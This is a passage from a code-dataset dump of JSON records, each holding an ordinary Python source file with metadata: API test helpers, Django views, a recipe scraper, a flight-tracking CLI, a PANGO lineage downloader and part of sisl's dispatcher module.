"classification_models.classification_model.Abstract_model", "line_number": 104, "usage_type": "name"}, {"api_name": "datasets.dataset.Dataset", "line_number": 106, "usage_type": "name"}, {"api_name": "pickle.load", "line_number": 115, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 133, "usage_type": "call"}, {"api_name": "cv2.resize", "line_number": 139, "usage_type": "call"}, {"api_name": "numpy.float32", "line_number": 139, "usage_type": "attribute"}, {"api_name": "tensorflow.placeholder", "line_number": 152, "usage_type": "call"}, {"api_name": "tensorflow.bool", "line_number": 152, "usage_type": "attribute"}, {"api_name": "tensorflow.Variable", "line_number": 158, "usage_type": "call"}, {"api_name": "tensorflow.nn.softmax", "line_number": 165, "usage_type": "call"}, {"api_name": "tensorflow.nn", "line_number": 165, "usage_type": "attribute"}, {"api_name": "tensorflow.variable_scope", "line_number": 168, "usage_type": "call"}, {"api_name": "tensorflow.squeeze", "line_number": 170, "usage_type": "call"}, {"api_name": "tensorflow.cast", "line_number": 173, "usage_type": "call"}, {"api_name": "tensorflow.argmax", "line_number": 173, "usage_type": "call"}, {"api_name": "tensorflow.int32", "line_number": 173, "usage_type": "attribute"}, {"api_name": "tensorflow.stack", "line_number": 174, "usage_type": "call"}, {"api_name": "tensorflow.range", "line_number": 174, "usage_type": "call"}, {"api_name": "tensorflow.shape", "line_number": 174, "usage_type": "call"}, {"api_name": "tensorflow.gather_nd", "line_number": 178, "usage_type": "call"}, {"api_name": "tensorflow.transpose", "line_number": 178, "usage_type": "call"}, {"api_name": "tensorflow.expand_dims", "line_number": 185, "usage_type": "call"}, {"api_name": "tensorflow.reduce_max", "line_number": 186, "usage_type": "call"}, {"api_name": "tensorflow.cast", "line_number": 187, "usage_type": "call"}, {"api_name": "tensorflow.float32", "line_number": 187, "usage_type": "attribute"}, {"api_name": "tensorflow.multiply", "line_number": 191, "usage_type": "call"}, {"api_name": "tensorflow.reduce_sum", "line_number": 193, "usage_type": "call"}, {"api_name": "tensorflow.expand_dims", "line_number": 194, "usage_type": "call"}, {"api_name": "tensorflow.reduce_sum", "line_number": 194, "usage_type": "call"}, {"api_name": "tensorflow.reduce_sum", "line_number": 196, "usage_type": "call"}, {"api_name": "tensorflow.reduce_mean", "line_number": 197, "usage_type": "call"}, {"api_name": "tensorflow.squeeze", "line_number": 197, "usage_type": "call"}, {"api_name": "tensorflow.pow", "line_number": 199, "usage_type": "call"}, {"api_name": "tensorflow.placeholder_with_default", "line_number": 202, "usage_type": "call"}, {"api_name": "tensorflow.zeros_like", "line_number": 202, "usage_type": "call"}, {"api_name": "tensorflow.reduce_mean", "line_number": 204, "usage_type": "call"}, {"api_name": "tensorflow.multiply", "line_number": 204, "usage_type": "call"}, {"api_name": "tensorflow.variable_scope", "line_number": 206, "usage_type": "call"}, {"api_name": "tensorflow.losses.softmax_cross_entropy", "line_number": 207, "usage_type": "call"}, {"api_name": "tensorflow.losses", "line_number": 207, "usage_type": "attribute"}, {"api_name": "tensorflow.get_collection", "line_number": 213, "usage_type": "call"}, {"api_name": "tensorflow.GraphKeys", "line_number": 213, "usage_type": "attribute"}, {"api_name": "tensorflow.control_dependencies", "line_number": 214, "usage_type": "call"}, {"api_name": "tensorflow.train.AdamOptimizer", "line_number": 215, "usage_type": "call"}, {"api_name": "tensorflow.train", "line_number": 215, "usage_type": "attribute"}, {"api_name": "tensorflow.argmax", "line_number": 219, "usage_type": "call"}, {"api_name": "tensorflow.equal", "line_number": 220, "usage_type": "call"}, {"api_name": "tensorflow.argmax", "line_number": 220, "usage_type": "call"}, {"api_name": "tensorflow.reduce_mean", "line_number": 221, "usage_type": "call"}, {"api_name": "tensorflow.cast", "line_number": 221, "usage_type": "call"}, {"api_name": "tensorflow.float32", "line_number": 221, "usage_type": "attribute"}, {"api_name": "tensorflow.Session", "line_number": 227, "usage_type": "call"}, {"api_name": "datasets.quickdraw_dataset.QuickDraw_Dataset", "line_number": 228, "usage_type": "call"}]} +{"seq_id": "38872301200", "text": "#!/usr/bin/env python3\n# -*- coding:utf-8 -*-\nimport json\nimport requests\nimport unittest\nimport sys\nsys.path.append(\"../..\") # 统一将包的搜索路径提升到项目根目录下\n\nfrom lib.read_execl import *\nfrom lib.case_log import log_case_info\n\nclass BaseCase(unittest.TestCase): # 继承unittest.TestCase\n @classmethod\n def setUpClass(cls):\n if cls.__name__ != 'BaseCase':\n cls.data_list = excel_to_list(data_file, cls.__name__)\n\n\n def get_case_data(self, case_name):\n return get_test_data(self.data_list, case_name)\n\n def send_request(self, case_data):\n case_name = get_test_data('case_name')\n url= case_data.get('url')\n args = case_data.get('args')\n headers = case_data.get('headers')\n expect_res = case_data.get('expect_res')\n method = case_data.get('method')\n data_type = case_data.get('data_type')\n\n if method.upper() == 'GET':\n res = requests.get(url=url, params=json.loads(args))\n\n elif data_type.upper == 'FROM':\n res = requests.post(url=url, data=json.loads(args), headers=json.loads(headers))\n log_case_info(case_name, url, args, expect_res, res.text)\n self.assertEqual(res.text, expect_res)\n\n else:\n res = requests.post(url=url, json=json.loads(args), headers=json.loads(headers)) # JSON格式请求\n log_case_info(case_name, url, args, json.dumps(json.loads(expect_res), sort_keys=True),\n json.dumps(res.json(), ensure_ascii=False, sort_keys=True))\n self.assertDictEqual(res.json(), json.loads(expect_res))\n\n", "repo_name": "heartyzw/api-test", "sub_path": "test/case/basecase.py", "file_name": "basecase.py", "file_ext": "py", "file_size_in_byte": 1641, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "61", "api": [{"api_name": "sys.path.append", "line_number": 7, "usage_type": "call"}, {"api_name": "sys.path", "line_number": 7, "usage_type": "attribute"}, {"api_name": "unittest.TestCase", "line_number": 12, "usage_type": "attribute"}, {"api_name": "requests.get", "line_number": 32, "usage_type": "call"}, {"api_name": "json.loads", "line_number": 32, "usage_type": "call"}, {"api_name": "requests.post", "line_number": 35, "usage_type": "call"}, {"api_name": "json.loads", "line_number": 35, "usage_type": "call"}, {"api_name": "lib.case_log.log_case_info", "line_number": 36, "usage_type": "call"}, {"api_name": "requests.post", "line_number": 40, "usage_type": "call"}, {"api_name": "json.loads", "line_number": 40, "usage_type": "call"}, {"api_name": "lib.case_log.log_case_info", "line_number": 41, "usage_type": "call"}, {"api_name": "json.dumps", "line_number": 41, "usage_type": "call"}, {"api_name": "json.loads", "line_number": 41, "usage_type": "call"}, {"api_name": "json.dumps", "line_number": 42, "usage_type": "call"}, {"api_name": "json.loads", "line_number": 43, "usage_type": "call"}]} +{"seq_id": "72048190594", "text": "from django.http import HttpResponseRedirect\nfrom django.shortcuts import render\nfrom facebook.models import Person\nfrom facebook.forms import LoginForm\nfrom django.contrib.auth.decorators import login_required\nfrom django.contrib.auth import authenticate, login, logout\nfrom django.core.paginator import Paginator, EmptyPage, PageNotAnInteger\n\n\n@login_required\ndef index(request):\n search = request.GET.get(\"q\", \"\")\n persons = Person.objects.all().order_by(\"lastname\") if search == \"\" else Person.objects.filter(slug__icontains=search).order_by(\"lastname\")\n paginator = Paginator(persons, 10)\n page = request.GET.get('page')\n\n try:\n persons = paginator.page(page)\n except PageNotAnInteger:\n # If page is not an integer, deliver first page.\n persons = paginator.page(1)\n except EmptyPage:\n # If page is out of range (e.g. 9999), deliver last page of results.\n persons = paginator.page(paginator.num_pages)\n\n context = {\n \"search\": search,\n \"persons\": persons,\n \"next_birthday\": Person.objects.get_birthday(4)\n }\n\n return render(request, \"facebook.html\", context)\n\n\n@login_required\ndef person_by_slug(request, slug):\n context = {\n \"person\": Person.objects.get(slug=slug),\n }\n\n return render(request, \"person.html\", context)\n\n\ndef person_login(request):\n next = request.GET.get(\"next\", \"/\")\n\n if request.user.is_authenticated():\n return HttpResponseRedirect(\"/\")\n if request.method == \"POST\":\n form = LoginForm(request.POST)\n if form.is_valid():\n username = form.cleaned_data[\"username\"]\n password = form.cleaned_data[\"password\"]\n person = authenticate(username=username, password=password)\n if person is not None:\n login(request, person)\n return HttpResponseRedirect(next)\n else:\n return render(request, \"login.html\", {\"form\": form})\n else:\n return render(request, \"login.html\", {\"form\": form})\n else:\n context = {\n \"form\": LoginForm()\n }\n\n return render(request, \"login.html\", context)\n\n\ndef person_logout(request):\n logout(request)\n return HttpResponseRedirect(\"/login/\")\n", "repo_name": "hoest/amitie", "sub_path": "facebook/views.py", "file_name": "views.py", "file_ext": "py", "file_size_in_byte": 2096, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "61", "api": [{"api_name": "facebook.models.Person.objects.all", "line_number": 13, "usage_type": "call"}, {"api_name": "facebook.models.Person.objects", "line_number": 13, "usage_type": "attribute"}, {"api_name": "facebook.models.Person", "line_number": 13, "usage_type": "name"}, {"api_name": "facebook.models.Person.objects.filter", "line_number": 13, "usage_type": "call"}, {"api_name": "django.core.paginator.Paginator", "line_number": 14, "usage_type": "call"}, {"api_name": "django.core.paginator.PageNotAnInteger", "line_number": 19, "usage_type": "name"}, {"api_name": "django.core.paginator.EmptyPage", "line_number": 22, "usage_type": "name"}, {"api_name": "facebook.models.Person.objects.get_birthday", "line_number": 29, "usage_type": "call"}, {"api_name": "facebook.models.Person.objects", "line_number": 29, "usage_type": "attribute"}, {"api_name": "facebook.models.Person", "line_number": 29, "usage_type": "name"}, {"api_name": "django.shortcuts.render", "line_number": 32, "usage_type": "call"}, {"api_name": "django.contrib.auth.decorators.login_required", "line_number": 10, "usage_type": "name"}, {"api_name": "facebook.models.Person.objects.get", "line_number": 38, "usage_type": "call"}, {"api_name": "facebook.models.Person.objects", "line_number": 38, "usage_type": "attribute"}, {"api_name": "facebook.models.Person", "line_number": 38, "usage_type": "name"}, {"api_name": "django.shortcuts.render", "line_number": 41, "usage_type": "call"}, {"api_name": "django.contrib.auth.decorators.login_required", "line_number": 35, "usage_type": "name"}, {"api_name": "django.http.HttpResponseRedirect", "line_number": 48, "usage_type": "call"}, {"api_name": "facebook.forms.LoginForm", "line_number": 50, "usage_type": "call"}, {"api_name": "django.contrib.auth.authenticate", "line_number": 54, "usage_type": "call"}, {"api_name": "django.contrib.auth.login", "line_number": 56, "usage_type": "call"}, {"api_name": "django.http.HttpResponseRedirect", "line_number": 57, "usage_type": "call"}, {"api_name": "django.shortcuts.render", "line_number": 59, "usage_type": "call"}, {"api_name": "django.shortcuts.render", "line_number": 61, "usage_type": "call"}, {"api_name": "facebook.forms.LoginForm", "line_number": 64, "usage_type": "call"}, {"api_name": "django.shortcuts.render", "line_number": 67, "usage_type": "call"}, {"api_name": "django.contrib.auth.logout", "line_number": 71, "usage_type": "call"}, {"api_name": "django.http.HttpResponseRedirect", "line_number": 72, "usage_type": "call"}]} +{"seq_id": "12794499702", "text": "from django.db import models\n\nfrom quiz.models.questions import Question\n\nclass Choice(models.Model):\n value = models.IntegerField()\n text = models.TextField()\n question = models.ForeignKey(\n Question,\n on_delete=models.CASCADE,\n blank=False,\n related_name='choices',\n null=False\n )", "repo_name": "hazem-elsaayed/personality-test", "sub_path": "server/quiz/models/choices.py", "file_name": "choices.py", "file_ext": "py", "file_size_in_byte": 329, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "61", "api": [{"api_name": "django.db.models.Model", "line_number": 5, "usage_type": "attribute"}, {"api_name": "django.db.models", "line_number": 5, "usage_type": "name"}, {"api_name": "django.db.models.IntegerField", "line_number": 6, "usage_type": "call"}, {"api_name": "django.db.models", "line_number": 6, "usage_type": "name"}, {"api_name": "django.db.models.TextField", "line_number": 7, "usage_type": "call"}, {"api_name": "django.db.models", "line_number": 7, "usage_type": "name"}, {"api_name": "django.db.models.ForeignKey", "line_number": 8, "usage_type": "call"}, {"api_name": "quiz.models.questions.Question", "line_number": 9, "usage_type": "argument"}, {"api_name": "django.db.models", "line_number": 8, "usage_type": "name"}, {"api_name": "django.db.models.CASCADE", "line_number": 10, "usage_type": "attribute"}, {"api_name": "django.db.models", "line_number": 10, "usage_type": "name"}]} +{"seq_id": "36455704734", "text": "#!/usr/bin/env python3\n\n__author__ = \"Md. Minhazul Haque\"\n__version__ = \"0.1.0\"\n__license__ = \"GPLv3\"\n\n\"\"\"\nCopyright (c) 2018 Md. Minhazul Haque\nThis file is part of mdminhazulhaque/bd-mrp-api\n(see https://github.com/mdminhazulhaque/banglalionwimaxapi).\nThis program is free software: you can redistribute it and/or modify\nit under the terms of the GNU General Public License as published by\nthe Free Software Foundation, either version 3 of the License, or\n(at your option) any later version.\nThis program is distributed in the hope that it will be useful,\nbut WITHOUT ANY WARRANTY; without even the implied warranty of\nMERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\nGNU General Public License for more details.\nYou should have received a copy of the GNU General Public License\nalong with this program. If not, see .\n\"\"\"\n\nimport json\nfrom datetime import datetime\nimport sys\nimport os\nimport requests\nfrom tabulate import tabulate\n\nBASE = \"https://flightaware.com/live/flight/\"\nHEADERS = [\"time\", \"lat\", \"long\", \"alt\", \"gs\"]\nLIMIT = int(os.environ['LIMIT']) if 'LIMIT' in os.environ else 10\n\nif __name__ == \"__main__\":\n try:\n flight = sys.argv[1].strip()\n except:\n exit(\"Flight number required\")\n \n try:\n response = requests.get(BASE + flight)\n except:\n exit(\"Request cannot be fetched\")\n \n # If 301, then get redirected flight name\n if response.status_code == 301:\n newurl = response.headers['Location']\n flight = newurl.split(\"/\")[-1]\n response = requests.get(BASE + flight)\n \n # extract data from script tag in html\n head = \"\"\n \n for line in response.text.split(\"\\n\"):\n if head in line:\n data = line.replace(head, \"\").replace(tail, \"\")\n break\n \n tab = []\n try:\n data = json.loads(data)\n except:\n exit(\"Flight data not found\")\n \n for key in data['flights']:\n flight_id = key\n break\n \n if \"INVALID\" in flight_id:\n exit(\"Invalid flight number\")\n \n for track in data['flights'][flight_id]['track']:\n ts = int(track['timestamp'])\n timestamp = datetime.fromtimestamp(ts)\\\n .strftime('%Y-%m-%d %H:%M:%S')\n row = [\n timestamp,\n track['coord'][0],\n track['coord'][1],\n track['alt'],\n track['gs']\n ]\n tab.append(row)\n \n if len(tab) < LIMIT:\n print(tabulate(tab, headers=HEADERS))\n else:\n print(tabulate(tab[-LIMIT:], headers=HEADERS))\n", "repo_name": "mdminhazulhaque/flightaware-cli", "sub_path": "flightaware.py", "file_name": "flightaware.py", "file_ext": "py", "file_size_in_byte": 2649, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "61", "api": [{"api_name": "os.environ", "line_number": 32, "usage_type": "attribute"}, {"api_name": "sys.argv", "line_number": 36, "usage_type": "attribute"}, {"api_name": "requests.get", "line_number": 41, "usage_type": "call"}, {"api_name": "requests.get", "line_number": 49, "usage_type": "call"}, {"api_name": "json.loads", "line_number": 62, "usage_type": "call"}, {"api_name": "datetime.datetime.fromtimestamp", "line_number": 75, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 75, "usage_type": "name"}, {"api_name": "tabulate.tabulate", "line_number": 87, "usage_type": "call"}, {"api_name": "tabulate.tabulate", "line_number": 89, "usage_type": "call"}]} +{"seq_id": "73738133955", "text": "import argparse\nimport datetime\nimport logging\nimport pathlib\nimport shutil\n\nfrom . import task\nfrom . import util\n\ndef process_arguments():\n parser = argparse.ArgumentParser(description='Download PANGO lineage dataset')\n\n parser.add_argument('--s3-sync-dir', type=str, required=False,\n help='Override for directory to which to deposit the output files for sync')\n parser.add_argument('--rclone-destination', type=str, default=None,\n help='If given, the `--s3-sync-dir` will be copied over to that destination with `rclone`.')\n\n parser.add_argument('--endpoint-url', type=str, default=ENDPOINT,\n help='Override for the URL of the Covid19Datos V2 API endpoint root.')\n parser.add_argument('--duckdb-file', type=str, default='Covid19Datos-V2.duckdb',\n help='Override name of the DuckDB database file. Default: `Covid19Datos-V2.duckdb`.')\n parser.add_argument('--rclone-command', type=str, default='rclone',\n help='Override the path to the rclone command. Default: `rclone`.')\n\n return parser.parse_args()\n\nENDPOINT = 'https://raw.githubusercontent.com/cov-lineages/pango-designation/master'\n\ndef pango_lineages():\n \"\"\"Entry point for PANGO lineages download code.\"\"\"\n logging.basicConfig(\n format='%(asctime)s %(threadName)s %(message)s',\n level=logging.INFO)\n util.log_platform()\n args = process_arguments()\n\n now = pick_and_log_now()\n parquetfile = download_and_convert(args, now)\n\n if args.s3_sync_dir:\n move_to_sync_dir(args, parquetfile, now)\n\n if args.rclone_destination:\n task.rclone(\n args.s3_sync_dir,\n args.rclone_destination,\n args.rclone_command)\n\ndef download_and_convert(args, now):\n duck = util.make_duckdb_connection(\n args.duckdb_file,\n init=[\n 'INSTALL httpfs',\n 'LOAD httpfs'\n ]\n )\n jinja = util.make_jinja('pango')\n ts_format = '%Y-%m-%dT%H:%M:%SZ'\n parquetfile = f'lineages_{now.strftime(ts_format)}.parquet'\n\n template = jinja.get_template('lineages.sql.j2')\n sql = template.render(\n endpoint=args.endpoint_url,\n output_parquet=parquetfile,\n downloaded_at=now.isoformat()\n )\n with duck.cursor() as c:\n c.execute(sql)\n\n return parquetfile\n\ndef move_to_sync_dir(args, parquetfile, now):\n logging.info(\"Moving files to sync dir %s...\", args.s3_sync_dir)\n s3_sync_dir = pathlib.Path(args.s3_sync_dir)\n s3_sync_dir.mkdir(exist_ok=True)\n endpoint_dir = s3_sync_dir / 'pango'\n endpoint_dir.mkdir(exist_ok=True)\n dataset_dir = endpoint_dir / 'lineages'\n dataset_dir.mkdir(exist_ok=True)\n\n parquet_dir = dataset_dir / 'parquet_v1'\n parquet_dir.mkdir(parents=True, exist_ok=True)\n partition_dir = parquet_dir / f'downloaded_date={now.strftime(\"%Y-%m-%d\")}'\n partition_dir.mkdir(exist_ok=True)\n shutil.move(parquetfile, partition_dir)\n logging.info(\"Moved %s to %s...\", parquetfile, partition_dir)\n\n\ndef pick_and_log_now():\n now = datetime.datetime.utcnow()\n logging.info('Now = %s', now.isoformat())\n return now", "repo_name": "sacundim/covid-19-puerto-rico", "sub_path": "downloader/src/covid_19_puerto_rico_downloader/pango.py", "file_name": "pango.py", "file_ext": "py", "file_size_in_byte": 3211, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 13, "dataset": "github-code", "pt": "61", "api": [{"api_name": "argparse.ArgumentParser", "line_number": 11, "usage_type": "call"}, {"api_name": "logging.basicConfig", "line_number": 31, "usage_type": "call"}, {"api_name": "logging.INFO", "line_number": 33, "usage_type": "attribute"}, {"api_name": "logging.info", "line_number": 73, "usage_type": "call"}, {"api_name": "pathlib.Path", "line_number": 74, "usage_type": "call"}, {"api_name": "shutil.move", "line_number": 85, "usage_type": "call"}, {"api_name": "logging.info", "line_number": 86, "usage_type": "call"}, {"api_name": "datetime.datetime.utcnow", "line_number": 90, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 90, "usage_type": "attribute"}, {"api_name": "logging.info", "line_number": 91, "usage_type": "call"}]} +{"seq_id": "4828220659", "text": "from django.urls import path\n\nfrom . import views\n\nurlpatterns = [\n path('', views.index, name='index'),\n path('users//', views.user, name='user'),\n path('services//', views.service, name='service'),\n path('all///',\n views.user_service, name='user_service'),\n path('new', views.create, name='new_media_object'),\n]\n", "repo_name": "HanifCarroll/Media-Logger-Django", "sub_path": "media_logger_project/media_logger_app/urls.py", "file_name": "urls.py", "file_ext": "py", "file_size_in_byte": 385, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "61", "api": [{"api_name": "django.urls.path", "line_number": 6, "usage_type": "call"}, {"api_name": "django.urls.path", "line_number": 7, "usage_type": "call"}, {"api_name": "django.urls.path", "line_number": 8, "usage_type": "call"}, {"api_name": "django.urls.path", "line_number": 9, "usage_type": "call"}, {"api_name": "django.urls.path", "line_number": 11, "usage_type": "call"}]} +{"seq_id": "70451724676", "text": "\"\"\"\n75. Sort Colors\n\"\"\"\n\nfrom typing import List\n\nclass Solution:\n def sortColors(self, nums: List[int]) -> None:\n b, m, e = 0, 0, len(nums)-1\n\n while m <= e:\n if b < m and nums[m] == 0:\n nums[m], nums[b] = nums[b], nums[m]\n b += 1\n elif nums[m] == 2:\n nums[m], nums[e] = nums[e], nums[m]\n e -= 1\n else:\n m += 1\n", "repo_name": "dictator-x/practise_as", "sub_path": "algorithm/leetCode/0075_sort_colors.py", "file_name": "0075_sort_colors.py", "file_ext": "py", "file_size_in_byte": 437, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "61", "api": [{"api_name": "typing.List", "line_number": 8, "usage_type": "name"}]} +{"seq_id": "13422843414", "text": "from bs4 import BeautifulSoup\nfrom urllib.request import urlopen, urlretrieve\nimport time\nimport re\nimport os\nimport csv\n\nurl = \"https://www.allrecipes.com/recipes/\"\npage_url = \"?page=\"\npages = 15\ncsv_file = './info.csv'\n## csv_directory = \"./dataset\"\n## image_directory = \"./dataset/images\"\n\n# check https://www.allrecipes.com/robots.txt\ncrawl_delay = 3\n\n# create csv file\nif os.path.isfile(csv_file) == False:\n with open(csv_file, 'w') as csvfile:\n filewriter = csv.writer(csvfile, delimiter=',', quotechar='|', quoting=csv.QUOTE_MINIMAL)\n filewriter.writerow(['Name', 'Calories', 'Serving Size', 'Fat(g)', 'Carbohydrate(g)', 'Protein(g)', 'Cholesterol(mg)', 'Sodium(mg)', 'Category', 'URL'])\n\nnames = []\nurls = {}\nitem = 0\n\nhtml = urlopen(url)\n\nsoup = BeautifulSoup(html, features=\"lxml\")\nfor tag in soup.find_all('a', {'href': re.compile('allrecipes.com/recipes')}):\n text = tag.get_text().lstrip()\n text = text.rstrip()\n if text not in urls.keys():\n # urls = {category: url}\n urls[text] = tag.get('href')\n\n\nfor category, link in urls.items():\n\n for page in range(pages):\n page += 1\n\n if page == 1:\n target_url = link\n else:\n target_url = link + page_url + str(page)\n\n print(\"PAGE: \" + str(page))\n print(\"URL: \" + target_url)\n print(\"\\n\")\n\n try:\n target_html = urlopen(target_url)\n soup = BeautifulSoup(target_html, features=\"lxml\")\n except:\n continue\n\n try:\n\n for tag in soup.find_all('article', {'class':['fixed-recipe-card', 'ng-isolate-scope']}):\n try:\n ## recipe_image = tag.find_all('img', {'class': 'fixed-recipe-card__img'})[0].get('data-original-src')\n\n recipe_url = tag.find_all('a', {'href': re.compile('allrecipes.com/recipe/')}, {'data-click-id': re.compile('card slot')})[0].get('href')\n recipe_html = urlopen(recipe_url)\n\n recipe_soup = BeautifulSoup(recipe_html, features=\"lxml\")\n\n name = recipe_soup.find_all('h1', {'class': 'recipe-summary__h1'})[0].get_text()\n name = name.replace('/', ' ')\n\n if name not in names:\n item += 1\n names.append(name)\n calories = recipe_soup.find_all('span', {'class': 'calorie-count'})[0].find_all('span')[0].get_text()\n calories = int(calories)\n serving_size = recipe_soup.find_all('meta', {'id': 'metaRecipeServings'})[0].get('content')\n\n nutrition = recipe_soup.find_all('div', {'class': \"nutrition-summary-facts\"})[0]\n fat = nutrition.find_all('span', {'itemprop': 'fatContent'})[0].get_text()\n carbohydrate = nutrition.find_all('span', {'itemprop': 'carbohydrateContent'})[0].get_text()\n protein = nutrition.find_all('span', {'itemprop': 'proteinContent'})[0].get_text()\n cholesterol = nutrition.find_all('span', {'itemprop': 'cholesterolContent'})[0].get_text()\n sodium = nutrition.find_all('span', {'itemprop': 'sodiumContent'})[0].get_text()\n nutrition = [fat, carbohydrate, protein, cholesterol, sodium]\n\n print(\"Item: \" + str(item))\n print(\"Name: \" + name)\n print(\"Calories: \" + str(calories))\n ## print(\"Image URL: \" + recipe_image)\n print(\"Serving Size: \" + serving_size)\n print(\"Fat: \" + fat + \"g\")\n print(\"Carbohydrate: \" + carbohydrate + \"g\")\n print(\"Protein: \" + protein + \"g\")\n print(\"Cholesterol: \" + cholesterol + \"mg\")\n print(\"Sodium: \" + sodium + \"mg\")\n print(\"Category: \" + category)\n print(\"URL: \" + recipe_url + \"\\n\")\n\n # save data\n with open(csv_file, 'a') as csvfile:\n filewriter = csv.writer(csvfile)\n filewriter.writerow(\n [name, str(calories), serving_size, fat, carbohydrate, protein, cholesterol, sodium, category, recipe_url])\n ## urlretrieve(recipe_image, image_directory + \"/\" + name)\n\n print(\"\\n\")\n except:\n continue\n\n time.sleep(crawl_delay)\n\n except:\n continue", "repo_name": "SamsonYuBaiJian/tracklah", "sub_path": "back-end/scraper.py", "file_name": "scraper.py", "file_ext": "py", "file_size_in_byte": 4665, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "61", "api": [{"api_name": "os.path.isfile", "line_number": 19, "usage_type": "call"}, {"api_name": "os.path", "line_number": 19, "usage_type": "attribute"}, {"api_name": "csv.writer", "line_number": 21, "usage_type": "call"}, {"api_name": "csv.QUOTE_MINIMAL", "line_number": 21, "usage_type": "attribute"}, {"api_name": "urllib.request.urlopen", "line_number": 28, "usage_type": "call"}, {"api_name": "bs4.BeautifulSoup", "line_number": 30, "usage_type": "call"}, {"api_name": "re.compile", "line_number": 31, "usage_type": "call"}, {"api_name": "urllib.request.urlopen", "line_number": 54, "usage_type": "call"}, {"api_name": "bs4.BeautifulSoup", "line_number": 55, "usage_type": "call"}, {"api_name": "re.compile", "line_number": 65, "usage_type": "call"}, {"api_name": "urllib.request.urlopen", "line_number": 66, "usage_type": "call"}, {"api_name": "bs4.BeautifulSoup", "line_number": 68, "usage_type": "call"}, {"api_name": "csv.writer", "line_number": 103, "usage_type": "call"}, {"api_name": "time.sleep", "line_number": 112, "usage_type": "call"}]} +{"seq_id": "4255242654", "text": "# This Source Code Form is subject to the terms of the Mozilla Public\n# License, v. 2.0. If a copy of the MPL was not distributed with this\n# file, You can obtain one at https://mozilla.org/MPL/2.0/.\n\"\"\" Dispatcher classes for handling methods dispatched for wrapped function calls.\n\nThis method allows classes to dispatch methods through other classes.\n\nHere is a small snippet showing how to utilize this module.\n\n\"\"\"\nimport logging\nfrom abc import ABCMeta, abstractmethod\nfrom collections import ChainMap, namedtuple\nfrom functools import update_wrapper\n\n__all__ = [\n \"AbstractDispatch\",\n \"ObjectDispatcher\",\n \"MethodDispatcher\",\n \"ErrorDispatcher\",\n \"ClassDispatcher\",\n \"TypeDispatcher\",\n]\n\n_log = logging.getLogger(\"sisl\")\n_log.info(f\"adding logger: {__name__}\")\n_log = logging.getLogger(__name__)\n\n\ndef _dict_to_str(name, d, parser=None):\n \"\"\"Convert a dict to __str__ representation\"\"\"\n if parser is None:\n\n def parser(kv):\n return f\" {kv[0]}: {kv[1]}\"\n\n d_str = \",\\n \".join(map(parser, d.items()))\n if len(d_str) > 0:\n return f\"{name} ({len(d)}): [\\n {d_str}\\n ]\"\n return \"\"\n\n\nclass AbstractDispatch(metaclass=ABCMeta):\n r\"\"\"Dispatcher class used for dispatching function calls\"\"\"\n\n def __init__(self, obj, **attrs):\n self._obj = obj\n # Local dictionary with attributes.\n # This could in principle contain anything.\n self._attrs = attrs\n _log.info(f\"__init__ {self.__class__.__name__}\", extra={\"obj\": self})\n\n def copy(self):\n \"\"\"Create a copy of this object (will not copy `obj`)\"\"\"\n _log.debug(f\"copy {self.__class__.__name__}\", extra={\"obj\": self})\n return self.__class__(self._obj, **self._attrs)\n\n def renew(self, **attrs):\n \"\"\"Create a new class with updated attributes\"\"\"\n _log.debug(f\"renew {self.__class__.__name__}\", extra={\"obj\": self})\n return self.__class__(self._obj, **{**self._attrs, **attrs})\n\n def __call__(self, *args, **kwargs):\n _log.debug(f\"call {self.__class__.__name__}{args}\", extra={\"obj\": self})\n return self.dispatch(*args, **kwargs)\n\n def __str__(self):\n obj = str(self._obj).replace(\"\\n\", \"\\n \")\n attrs = _dict_to_str(\"attrs\", self._attrs)\n if len(attrs) == 0:\n return f\"{self.__class__.__name__}{{{obj}}}\"\n return f\"{self.__class__.__name__}{{{obj}, {attrs}\\n}}\"\n\n def __repr__(self):\n nattrs = len(self._attrs)\n return f\"<{self.__class__.__name__}{{{self._obj!r}, nattrs={nattrs}}}>\"\n\n def _get_object(self):\n \"\"\"Retrieves the object (self._obj) but also checks that the object is in fact an object (`type`)\n\n This will fail if the dispatch method has been called on the class (not an instance).\n \"\"\"\n obj = self._obj\n if isinstance(obj, type):\n raise ValueError(f\"Dispatcher on {obj} must not be called on the class.\")\n return obj\n\n def _get_class(self, allow_instance=False):\n \"\"\"Retrieves the object (self._obj) but also checks that the object is a class (not an instance, `type`)\n\n This will fail if the dispatch method has been called on an instance (not a class).\n \"\"\"\n obj = self._obj\n if isinstance(obj, type):\n return obj\n if allow_instance:\n return obj.__class__\n raise ValueError(f\"Dispatcher on {obj} must not be called on the instance.\")\n\n @abstractmethod\n def dispatch(self, method):\n \"\"\"Create dispatched method with correctly wrapped documentation\n\n This should return a function that mimics method but wraps it\n in some way.\n\n A basic interception would be\n\n .. code:: python\n @wraps(method)\n def func(*args, **kwargs):\n return method(*args, **kwargs)\n\n \"\"\"\n\n def __getattr__(self, key):\n attr = getattr(self._obj, key)\n if callable(attr):\n return self.dispatch(attr)\n return attr\n\n\nclass AbstractDispatcher(metaclass=ABCMeta):\n \"\"\"A container for dispatchers\n\n This is an abstract class holding the dispatch classes (`AbstractDispatch`)\n and the attributes that are associated with the dispatchers.\n \"\"\"\n\n def __init__(self, dispatchs=None, default=None, **attrs):\n if dispatchs is None:\n dispatchs = {}\n if not isinstance(dispatchs, ChainMap):\n dispatchs = ChainMap(dispatchs)\n # we will always use a chainmap to store the dispatches\n # We must not *copy*\n # It should be the same memory location in case we are\n # passing around the dispatch sequences\n self._dispatchs = dispatchs\n self._default = default\n self.__name__ = self.__class__.__name__\n # Attributes associated with the dispatcher\n self._attrs = attrs\n _log.info(f\"__init__ {self.__class__.__name__}\", extra={\"obj\": self})\n\n def copy(self):\n \"\"\"Create a copy of this object (making a new child for the dispatch 